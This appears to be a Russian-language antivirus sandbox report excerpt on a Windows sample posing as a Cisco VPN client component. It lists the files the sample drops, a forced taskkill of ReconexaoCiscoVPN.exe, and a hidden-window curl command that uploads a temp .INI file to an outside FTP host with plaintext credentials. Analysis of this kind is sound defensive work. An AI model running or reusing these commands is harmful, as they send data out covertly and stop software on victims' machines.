Техническая информация
- '%WINDIR%\syswow64\taskkill.exe' /F /IM ReconexaoCiscoVPN.exe
- %WINDIR%\syswow64\explorer.exe
- %TEMP%\nswe531.tmp\execdos.dll
- %TEMP%\nswe531.tmp\processes.dll
- %ProgramFiles(x86)%\cisco systems\vpn client\reconexaociscovpn.exe
- %ProgramFiles(x86)%\cisco systems\vpn client\vpnclient.ini
- %WINDIR%\verifversao.ini
- %TEMP%\___36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee_atucli_rcvpn2.ini
- %TEMP%\curl.exe
- %TEMP%\nswe531.tmp\nsexec.dll
- %TEMP%\nswe531.tmp\selfdel.dll
- %TEMP%\nswe531.tmp\execdos.dll
- %TEMP%\nswe531.tmp\nsexec.dll
- %TEMP%\nswe531.tmp\processes.dll
- %TEMP%\nswe531.tmp\selfdel.dll
- '20#.#03.125.108':21
- ClassName: '' WindowName: ''
- '%ProgramFiles(x86)%\cisco systems\vpn client\reconexaociscovpn.exe'
- '%TEMP%\curl.exe' --ftp-create-dirs -T "%TEMP%\___36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee_atucli_rcvpn2.INI" -v -s -S -u irtef2:Mcvrmlh2 ftp://20#.#03.125.108/UPDATES/atucli_rcvpn2/
- '%WINDIR%\syswow64\taskkill.exe' /F /IM ReconexaoCiscoVPN.exe' (со скрытым окном)
- '%TEMP%\curl.exe' --ftp-create-dirs -T "%TEMP%\___36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee_atucli_rcvpn2.INI" -v -s -S -u irtef2:Mcvrmlh2 ftp://20#.#03.125.108/UPDATES/atucli_rcvpn2/' (со скрытым окном)
- '%WINDIR%\syswow64\explorer.exe' ' (со скрытым окном)
- '%WINDIR%\syswow64\explorer.exe'